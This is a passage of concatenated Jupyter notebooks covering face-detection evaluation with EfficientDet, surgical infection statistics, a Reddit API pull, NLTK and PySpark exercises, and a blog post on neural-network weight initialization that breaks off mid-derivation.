0.786 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.323 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.527 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.713 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.271 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.623 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.735 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | 
maxDets=100 ] = 0.420 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.639 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.783 # ``` # # + [markdown] id="WibIfXdeTUTc" # Results on Faces_DD with model **trained 9 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.635 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.941 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.769 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.271 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.511 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.691 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.261 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.604 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.714 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.343 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.620 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.765 # ``` # # # + [markdown] id="2Ox8OWDuZLNb" # Results on Faces_DD with model **trained 13 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.649 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.948 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.778 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.332 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.538 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.698 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.265 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.613 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | 
maxDets=100 ] = 0.725 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.422 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.645 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.767 # ``` # # # + [markdown] id="spxEjYPXX1x1" # Results on Faces_DD with model **trained 51 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.634 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.949 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.764 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.322 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.546 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.677 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.257 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.601 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.711 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.426 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.651 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.746 # ``` # # # + [markdown] id="lxWYXPgR4w_C" # Results on Faces_DD with model **trained 61** epochs on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.636 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.950 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.764 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.341 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.565 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.676 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.258 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all 
| maxDets= 10 ] = 0.608 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.721 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.455 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.667 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.754 # ``` # # # + [markdown] id="Wavtp1RcmMIR" # Results on Faces_DD with model **trained 87 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.630 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.947 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.743 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.315 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.550 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.674 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.259 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.604 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.714 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.424 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.645 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.752 # ``` # # # + [markdown] id="_EMeC5Q88WIM" # Results on Faces_DD with model **trained 179 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.617 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.946 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.739 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.322 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.533 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.659 # Average Recall (AR) @[ IoU=0.50:0.95 | area= 
all | maxDets= 1 ] = 0.258 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.595 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.699 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.437 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.636 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.733 # ``` # # # + [markdown] id="jGKs3w2_ZXnu" # # 3 Inference images. # # --- # # # + id="-bsmJsz67hTP" # %%capture # first export a saved model. saved_model_dir = 'savedmodel' # !rm -rf {saved_model_dir} # !python model_inspect.py --runmode=saved_model --model_name={MODEL} \ # --ckpt_path='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --saved_model_dir={saved_model_dir} \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false" # + id="tlh_S6M9ahe5" # Then run saved_model_infer to do inference. # Notably: batch_size, image_size must be the same as when it is exported. serve_image_out = 'serve_image_out' # !mkdir {serve_image_out} #'WIDER/WIDER_val/images/0--Parade/0_Parade_marchingband_1_147.jpg' \ #'WIDER/WIDER_val/images/2--Demonstration/2_Demonstration_Demonstration_Or_Protest_2_441.jpg' \ # !python model_inspect.py --runmode=saved_model_infer \ # --saved_model_dir={saved_model_dir} \ # --model_name={MODEL} \ # --input_image='WIDER/WIDER_val/images/2--Demonstration/2_Demonstration_Demonstration_Or_Protest_2_441.jpg' \ # --output_image_dir={serve_image_out} \ # --min_score_thresh={min_score_thresh} --max_boxes_to_draw={max_boxes_to_draw} # + colab={"base_uri": "https://localhost:8080/", "height": 586} id="7dF0S1aiEYjU" outputId="bd077ce8-78f9-45a3-c857-c50d4f2d2d13" from IPython import display display.display(display.Image(os.path.join(serve_image_out, '0.jpg')))
efficientdet/faces_test_EfficientDet_D4.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# Surgical-site infection (SSI) prevalence analysis: stacked-area plot of
# complication counts vs. number of operations, plus per-measure regressions.

# +
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

from bokeh.palettes import brewer
from bokeh.plotting import figure, output_notebook, show
from bokeh.models import LabelSet, ColumnDataSource

output_notebook()
# -

# Load data
dfx = pd.read_excel('../data/raw/Распространенность.xlsx', header=1, index_col=0)
dfx.head(10)

# Transpose so years become rows; drop the aggregate row and fill gaps.
dfx_t = dfx.transpose().drop('всего')
dfx_t.fillna(0, inplace=True)

# using dictionary to convert specific columns
convert_dict = {'количество операций': int,
                'глубокая': int,
                'поверхностная': int,
                'нога': int,
                'госпитальной ИОХВ всего': int,
                'после выписки ИОХВ до 90 дней': int,
                'всего': int
               }
dfx_t = dfx_t.astype(convert_dict)

df = (dfx_t[[ 'количество операций'
            , 'поверхностная'
            , 'нога'
            , 'глубокая'
            , 'после выписки ИОХВ до 90 дней'
            , 'всего'
            ]]
      .sort_values('количество операций')
      )

# +
p = figure(x_range=(85, 697), y_range=(0, 50))
p.grid.minor_grid_line_color = '#eeeeee'

# Stack the four complication categories (columns 1..4 of df).
names = list(df.columns[1:5])
p.varea_stack(stackers=names, x='количество операций',
              color=brewer['Spectral'][10][0:4], legend_label=names,
              source=df, alpha=0.9)

p.yaxis.axis_label = 'Количество осложнений'
p.xaxis.axis_label = 'Количество операций'
p.legend.location = "top_left"

# reverse the legend entries to match the stacked order
p.legend.items.reverse()

# Year labels: 2015 and 2018 are shifted left so they don't overlap points.
right_side = ColumnDataSource(df[~df.index.isin([2015, 2018])])
left_side = ColumnDataSource(df[df.index.isin([2015, 2018])])
labels_right = LabelSet(x='количество операций', y='всего', text='index',
                        level='annotation', x_offset=0, y_offset=0,
                        source=right_side, render_mode='canvas',
                        text_font_size='8pt')
labels_left = LabelSet(x='количество операций', y='всего', text='index',
                       level='annotation', x_offset=-25, y_offset=0,
                       source=left_side, render_mode='canvas',
                       text_font_size='8pt')
p.add_layout(labels_right)
p.add_layout(labels_left)

show(p)
# -

dfx_t.sort_values('количество операций')

# Reshape wide -> long. `var_name` is given explicitly: without it pandas
# falls back to the transposed frame's columns name (whatever label the Excel
# sheet carried), and df['показатель'] below would KeyError if that label
# ever differs.
df = dfx_t.melt(id_vars=['количество операций'],
                var_name='показатель',
                value_name='количество осложнений',
                value_vars=['глубокая', 'поверхностная', 'нога',
                            'госпитальной ИОХВ всего',
                            'после выписки ИОХВ до 90 дней', 'всего'])

# Map each measure to its infection type (hospital / post-discharge / total).
m = {'глубокая': 'госпитальная',
     'поверхностная': 'госпитальная',
     'нога': 'госпитальная',
     'госпитальной ИОХВ всего': 'госпитальная',
     'после выписки ИОХВ до 90 дней': 'после выписки',
     'всего': 'всего'
    }
df['Тип инфекции'] = df['показатель'].map(m)

# +
# Linear (order=1) regression per measure.
sns.set_theme(color_codes=True)
sns.lmplot(x='количество операций',
           y='количество осложнений',
           col='показатель',
           data=df,
           hue='Тип инфекции',
           col_wrap=3, height=4, order=1
          );

# +
# Quadratic (order=2) regression per measure.
sns.set_theme(color_codes=True)
sns.lmplot(x='количество операций',
           y='количество осложнений',
           col='показатель',
           data=df,
           hue='Тип инфекции',
           col_wrap=3, height=4, order=2
          );
# -
notebooks/09-oskin-spread.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# Pull Reddit posts/comments through the OAuth2 API and (optionally) dump
# them to CSV.

import requests
import requests.auth
import csv
import time

user_agent = "Test/0.1 by maxoboe"

def get_access_code(user_agent):
    """Return a Reddit OAuth2 access token via the password grant.

    Credentials are read from account_info.txt, one per line:
    username, password, client ID, client secret.
    """
    with open('account_info.txt', 'r') as file:
        lines = file.read().splitlines()
    username = lines[0]
    password = lines[1]
    clientID = lines[2]
    secretID = lines[3]
    client_auth = requests.auth.HTTPBasicAuth(clientID, secretID)
    post_data = {"grant_type": "password", "username": username,
                 "password": password}
    headers = {"User-Agent": user_agent}
    response = requests.post("https://www.reddit.com/api/v1/access_token",
                             auth=client_auth, data=post_data, headers=headers)
    return response.json()['access_token']

def try_request(endpoint, access_token, headers, second_try=False):
    """GET `endpoint`; on a 401 error refresh the token once and retry.

    Returns (access_token, response) so the caller keeps the possibly
    refreshed token.
    """
    response = requests.get(endpoint, headers=headers)
    # NOTE(review): Reddit reports auth failure in the JSON body as
    # {'error': 401} — presumably matching the HTTP status; confirm.
    if 'error' in response.json():
        if second_try:
            return access_token, response
        if response.json()['error'] == 401:
            # Bug fixes: the original called the undefined name
            # `get_access_token` (NameError on expiry) and passed
            # `user_agent` where `headers` was expected. Refresh the
            # token and rebuild the auth headers before retrying.
            access_token = get_access_code(user_agent)
            headers = {"Authorization": "bearer " + access_token,
                       "User-Agent": user_agent}
            return try_request(endpoint, access_token, headers,
                               second_try=True)
    return access_token, response

def format_row(child):
    """Flatten one API listing child into a {title, text, url} dict."""
    data = child['data']
    title = data['title']
    text = data['selftext']
    url = data['url']
    return {'title': title, 'text': text, 'url': url}

access_token = get_access_code(user_agent)
headers = {"Authorization": "bearer " + access_token,
           "User-Agent": user_agent}
query = "climate+change"
endpoint = "https://oauth.reddit.com/comments/fq2dp/im_skeptical_of_human_caused_global_warming_but/"
after = "none"
access_token, response = try_request(endpoint, access_token, headers)
print(response.json()['data'])

# with open('raw_queries.csv', 'w+', encoding='utf-8') as csvfile:
#     fieldnames = ['title', 'text', 'url']
#     writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
#     writer.writeheader()
#     while after is not None:
#         access_token, response = try_request(endpoint + "&after=" + after,
#                                              access_token, headers)
#         after = response.json()['data']['after']
#         for child in response.json()['data']['children']:
#             writer.writerow(format_row(child))
#         time.sleep(1.1)  # Rate limited to 60 requests per minute

# # Do this, but with after = after from first, count = count + 100
reddit-pull/API Test.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# Minimal NLTK text-processing pipeline demo:
# tokenize -> drop English stop words -> Porter-stem.

# +
from nltk import word_tokenize

sentence = "the less there is to justify a traditional custom, the harder it is to get rid of it."

# Step 1: split the sentence into word/punctuation tokens.
print("tokens:")
token_list = word_tokenize(sentence)
print(token_list)
print("-----------")

# Step 2: filter out common English stop words.
print("remove stop words")
from nltk.corpus import stopwords
english_stops = stopwords.words('english')
filtered = [tok for tok in token_list if tok not in english_stops]
print(filtered)
print("-----------------")

# Step 3: reduce the remaining words to their Porter stems.
print("steming")
from nltk.stem.porter import PorterStemmer
stemmer = PorterStemmer()
stems = [stemmer.stem(tok) for tok in filtered]
print(stems)
# -
Untitled.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] slideshow={"slide_type": "slide"} # # Numbers and Math # # ![](https://gifimage.net/wp-content/uploads/2017/10/calculations-gif-6.gif) # + [markdown] slideshow={"slide_type": "slide"} # ## What you'll learn in today's lesson # # - Built in numbers integers, floats, and complex numbers # - Rounding numbers # - e notation # - Arithmetic Operators and Expressions # - Common mathematical functions # - Printing numbers with specific formatting # -
Lecture Material/04_Numbers_and_Math/04.0-Introduction.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # 0. Importing PySpark

# +
from pyspark import SparkContext
from pyspark.sql import SparkSession

sc = SparkContext()
spark = SparkSession(sc)  # run this cell only once
# -

# # 1. Loading the dataset

# Parse the CSV with the csv module (handles quoted commas) and drop the
# header row plus malformed short rows.
import csv
rdd1 = sc.textFile("digikala_comments.csv")\
    .mapPartitions(lambda line: csv.reader(line, delimiter=',', quotechar='"'))\
    .filter(lambda line: len(line) >= 2 and line[0] != 'product_id')

rdd1.take(1)

# # 2. Most popular item

# Popularity score per product = likes (col 4) minus dislikes (col 5).
rdd1.map(lambda l: (l[0], int(l[4]) - int(l[5])))\
    .reduceByKey(lambda v1, v2: v1 + v2)\
    .max(key = lambda x: x[1])

# # 3. Percentage of unverified comments

total_count = rdd1.count()
not_verified_count = rdd1.filter(lambda l: l[6] != 'verified').count()
print((not_verified_count / total_count ) * 100)

# # 4. The largest word in the comment section

# Comment body is column 9; keep the longest whitespace-separated token.
rdd1.map(lambda l: l[9].split())\
    .flatMap(lambda x: x)\
    .map(lambda x: (x, len(x)))\
    .reduce(lambda w1, w2: w1 if w1[1] > w2[1] else w2)

# # 5. Top 10 words in advantages and disadvantages

import ast
persian_chars=["آ", "ا", "ب", "پ", "ت", "ث", "ج", "چ", "ح", "خ", "د", "ذ",
               "ر", "ز", "ژ", "س", "ش", "ص", "ض", "ط", "ظ", "ع", "غ", "ف",
               "ق", "ک" ,"گ", "ل", "م", "ن", "و" ,"ه", "ی"]

def preprocess_words(x):
    """Replace every non-Persian character in `x` with a space.

    Single pass over the string; the original looped over `x` calling
    str.replace once per character, rescanning and rebuilding the whole
    string each time (quadratic on long comments). Output is identical.
    """
    return "".join(c if c in persian_chars else " " for c in x)

def get_top_10_words(column_num):
    """Return the 10 most frequent Persian words in column `column_num`
    as (word, count) pairs, most frequent first."""
    return rdd1.filter(lambda l: l[column_num] != '')\
        .map(lambda l: l[column_num])\
        .map(preprocess_words)\
        .map(lambda x: x.split())\
        .flatMap(lambda x: x)\
        .map(lambda x: (x, 1))\
        .reduceByKey(lambda x, y: x + y)\
        .takeOrdered(10, key=lambda x: -x[1])

# Advantages column:

# + tags=[]
get_top_10_words(10)
# -

# Disadvantages column:

get_top_10_words(11)

# # 6. Most popular character in product's title

rdd1.map(lambda l: l[1])\
    .flatMap(lambda x: x)\
    .filter(lambda x: x in persian_chars)\
    .map(lambda x: (x, 1))\
    .reduceByKey(lambda x, y: x + y)\
    .takeOrdered(1, key=lambda x: -x[1])
Homeworks/01. Introduction to Spark/02. Dataset queries using Spark.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="Hh7kOH_zRcEw" colab_type="text" # # "An Overview of Initialization for Deep Neural Networks, Part 1" # # > "Without appropriate choice of activation function and/or smart initialization for it neural networks, especially deep ones, tend to refuse training at all. We will consider sigmoid and tanh activation functions and two initialization methods most suitable for them - LeCun and Xavier (Glorot) initialization." # # - toc: false # - branch: master # - badges: false # - comments: false # - categories: [fastpages, jupyter] # - use_math: true # + [markdown] id="Zk9STjSxfz-Z" colab_type="text" # For the past few years deep neural networks have proven themselves to be able to solve various AI-level tasks effectively. In some very specific tasks, such as image classification, game of Go, autonomous driving, and many others they already perform better than humans. These achievements were not possible without tremendous research invested in study of difficulties that occur during training of deep networks, and methods to overcome them. A part of this progress is due to better non-linearities and initialization methods. # # ## What Is the Choice of Activation Function and Initialization and Why Is It Important? # # # Neural networks are typically trained via stochastic gradient descent or one of its more powerful variants, such as RMSprop or Adam, that use gradients computed by the back propagation algorithm. The back propagation algorithm essentially recursively applies the chain rule of calculus to compute gradients efficiently. 
Just as a reminder, the chain rule of calculus look like this # # \begin{equation} # \frac{\partial}{\partial x}g(f(x)) = \frac{\partial g}{\partial f} \frac{\partial f}{\partial x} # \end{equation} # # In earlier years folks used sigmoid activation function, defined as # # \begin{equation} # \sigma(x) = \frac{1}{1 + e^{-x}} # \end{equation} # # However, soon it became evident that such nets are hard to train, because of some properties of sigmoid. One such property is the effect of saturation. Look at the graph of sigmoid. # + id="xSVhxtJJeM53" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 337} outputId="8d8dd903-1517-47b1-d019-9af95b02fb04" def sigmoid(x): return 1. / (1. + np.exp(-x)) def sigmoid_derivative(x): return sigmoid(x) * (1. - sigmoid(x)) def plot_activation_and_derivative(activation, derivative, inputs, titles): fig, (ax_f, ax_d) = plt.subplots(1, 2, sharey=True, figsize=(16, 5)) ax_f.plot(inputs, activation(inputs)) ax_f.set_title(titles[0]) ax_d.plot(inputs, derivative(inputs)) ax_d.set_title(titles[1]) plt.show() values = np.arange(-6.0, 6.0, 0.01) plot_activation_and_derivative(sigmoid, sigmoid_derivative, values, ('Sigmoid activation', 'Derivative of sigmoid')) # + [markdown] id="3Bufa3fPnFQ4" colab_type="text" # When input values become large enough (whether positive or negative), output of sigmoid remains roughly unchanged and goes to 1 in case of positive inputs, or to 0 in case of negative. This saturation of sigmoid causes gradient vanishing. Since output values are roughly equal in those saturated tails, the derivative of sigmoid becomes very close to zero. As back propagation progresses towards input layers, gradients get multiplied, and if at least one of multiples becomes close to zero, the whole product is likely to become close to zero as well. Hence it can require too many gradient updates to tweak parameters in right way. Now look at the graph of the derivative of sigmoid more closely. 
You can note that its maximum value is 0.25 when input value is 0. So, in the best case, gradient gets four times smaller after sigmoid activation during back propagation. # # There is another saturating activation function that, however, suffers less from vanishing gradient problems. It is called hyperbolic tangent, or tanh for short. # # \begin{equation} # \tanh(x) = \frac{e^x - e^{-x}}{e^x + e^{-x}} # \end{equation} # # Actually it can be shown from their definitions that tanh can be expressed in terms of sigmoid as follows # # \begin{equation} # \tanh(x) = 2\sigma(2x) - 1 # \end{equation} # # In spite of that, tanh has two advantages over the sigmoid. First, it is symmetric in the origin, which makes it easier to learn identity function, and second, maximum value of its derivative is 1. # + id="FIpAid-6zDvv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 337} outputId="7316624f-6f8c-4b46-8fe2-47c2037626a7" def tanh(x): return np.tanh(x) def tanh_derivative(x): return 1. / np.cosh(x) ** 2 plot_activation_and_derivative(tanh, tanh_derivative, values, ('Tanh activation', 'Tanh derivative')) # + [markdown] id="FP4Ce5lpxhQ-" colab_type="text" # Tanh is widely used in recurrent neural networks today. # # Nowadays we have many ways to address vanishing gradient and similar exploding gradient issues. And one of these is better initialization. Initialization is also important because gradient-based methods can stuck in bad local minima, not reaching the global minimum, and take long to converge because of plateus in the cost function surface. Better initialization reduces chances to start from "unlucky" points. # + [markdown] id="-RRTYIBsr3bA" colab_type="text" # ## LeCun Initialization # # This is one of the first heuristics for initialization. It was proposed in 1998 by <NAME> et al. in the paper called "[Efficient BackProp](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)". 
LeCun initialization suggests that weights of network are drawn from normal distribution of the following form # # \begin{equation} # W \sim \mathcal{N}\Bigg(0, \frac{1}{fan_{in}}\Bigg) # \end{equation} # # where $fan_{in}$ is the number of connections feeding into the node. This is also known as LeCun normal initialization, while in case of LeCun uniform initialization weights are drawn from uniform distribution # # \begin{equation} # W \sim \mathcal{U}\Bigg(-\frac{1}{\sqrt{fan_{in}}}, \frac{1}{\sqrt{fan_{in}}}\Bigg) # \end{equation} # # LeCun initialization was designed specifically for sigmoid activation. But it has more applications than that. It was proposed to be used with the [SELU activation function and self-normalizing networks](https://arxiv.org/pdf/1706.02515.pdf). # # Note that regardless the method of initialization, weights are usually drawn either from normal or uniform distribution, and there's connection between them. If we initialize from a normal distribution with $\mathrm{Var}[W] = \sigma^2$, we can easily switch to uniform distribution by computing $a = \sqrt{3\sigma^2}$ and sampling weights from $\mathcal{U}(-a, a)$. Because of this connection I will only consider normal distribution and specify suggested variance for it. # + [markdown] id="USE3UUSF2ReM" colab_type="text" # ### Derivation of LeCun Initialization # # The reasoning behind LeCun initialization is fairly simple. We don't want weights to be very large, because they will lead to saturation and cause gradient vanishing. We also don't want weights to be very small, because they will make gradient small as well and make the whole optimization slow. What we want is that initial weights map inputs into linear region of sigmoid (roughly between -2 and 2), so the gradient is large enough and network learns easier linear part first. 
# # Consider a sigmoid layer and let $x$ denote input example and $y$ linearly transformed input, so # # \begin{equation} # y = xW \\ # y_i = \sum_{j = 1}^{fan_{in}}{x_{j}w_{ji}} # \end{equation} # # We can think of bias term as weight that always receives 1 as input and omit it. To achieve the above requirements we first demand $x$ to have zero mean and variance of 1. This is satisfied by normalizing inputs. Now we want initialize weights so that they ensure $y$ also has zero mean and unit variance. Let's write down expression for the variance of $y_i$ # # \begin{equation} # \mathrm{Var}[y_i] = \mathrm{Var}\Bigg[\sum_{j = 1}^{fan_{in}}{x_{j}w_{ji}}\Bigg] = \sum_{j = 1}^{fan_{in}} w_{ji}^2\mathrm{Var}[x_j] + \sum_{j \neq k}w_{ji}w_{ki}\mathrm{Cov}[x_j, x_k] # \end{equation} # # Assuming uncorrelated $x$, we have $\mathrm{Cov}[x_j, x_k] = 0$ for all pairs $j \neq k$. Recall we assumed all $\mathrm{Var}[x_i] = 1$. Hence # # \begin{equation} # \mathrm{Var}[y_i] = \sum_{j = 1}^{fan_{in}} w_{ji}^2 \Rightarrow\ \mathrm{Var}[w] = \frac{\mathrm{Var}[y]}{fan_{in}} = \frac{1}{fan_{in}} # \end{equation} # # And that's it! One thing that should be mentioned here is that original paper also proposed a variant of sigmoid that ensures $\sigma(y)$ preserves zero mean and unit variance of $y$. # + [markdown] id="DwWYh6bA8_OI" colab_type="text" # ## Xavier (Glorot) Initialization # # The next method was proposed in paper "[Understanding the Difficulty of Training Deep Feedforward Neural Networks](http://proceedings.mlr.press/v9/glorot10a/glorot10a.pdf)" by <NAME> and <NAME> in 2010. I don't know who decides whether we should call an invention after author's first name or last name, but this technique is widely known under both Xavier initialization and Glorot initialization. # # If you have skimmed through the derivation of LeCun initialization above or read it in original paper, you might have noticed that it was motivated entirely from the perspective of the forward pass. 
In their paper Glorot and Bengio additionly require preserving variance of gradient during the backward pass. From one hand, the forward pass requires, as previously # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{in}} # \end{equation} # # They show that the backward pass from the other hand requires # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{out}} # \end{equation} # # where $fan_{out}$ is the number of connections going out of a unit. # # Both constraints can be satisfied if and only if $fan_{in} = fan_{out}$, which isn't always the case. As a compromise authors suggest to set variance to # # \begin{equation} # \mathrm{Var}[W] = \frac{1}{fan_{avg}} = \frac{2}{fan_{in} + fan_{out}} # \end{equation} # # Observe also that when $fan_{in} = fan_{out}$ Xavier initialization and LeCun initialization are equivalent. # # The paper compares performance of several networks of the same architecture that only differ in activation function and initialization method. Those networks were trained on different data sets using the same procedure. The final test errors for networks using tanh activation are represented in the following table # # TYPE | Shapeset | MNIST | CIFAR-10 | Small ImageNet # --- | --- | --- | --- | --- # Tanh | 27.15 | 1.76 | 55.9 | 70.58 # Tanh N | 15.60 | 1.64 | 52.92 | 68.57 # # Here tanh stands for the network with tanh activations and LeCun uniform initialization, while tanh N - for the network with tanh activations and Xavier uniform initialization. As can be seen, on all data sets Xavier initialization gives little to significant boost in performance when compared to LeCun initialization. # # A trouble with Xavier initialization is that it assumes linear units. This is a valid assumption when inputs are mapped to linear parts of non-linearities, but invalid in general. Nevertheless it still works pretty well. 
The following histograms of activation values and gradients from the paper show that Xavier initialization in experimental settings works as intended. Check out details in original paper! # + [markdown] id="nCK1TXhRPeoD" colab_type="text" # ### Derivation of Xavier Initialization # # Consider a neural network with $L$ consequent layers. We begin with writing down equations for both forward and backward propagations. We make the same assumptions about input data as in the derivation of LeCun initialization. The forward pass is given by # # \begin{equation} # Z^{[i]}_k = \varphi^{[i]}(Z^{[i - 1]}_k) W^{[i]}_{:, k} # \end{equation} # # And the backward pass by # # \begin{equation} # \frac{\partial\mathscr{L}}{\partial Z^{[i]}_k} = \varphi^{[i]\prime}(Z^{[i]}_k)W^{[i]}_{k, :}\frac{\partial\mathscr{L}}{\partial Z^{[i + 1]}} \\ # \frac{\partial\mathscr{L}}{\partial W^{[i]}_{lk}} = Z^{[i]}_l \frac{\partial\mathscr{L}}{\partial Z^{[i]}_k} # \end{equation} # # Then for a layer number $i$, assuming that $\varphi^{[i]\prime}(z^{[i]}_k) = 1$ # # \begin{equation} # 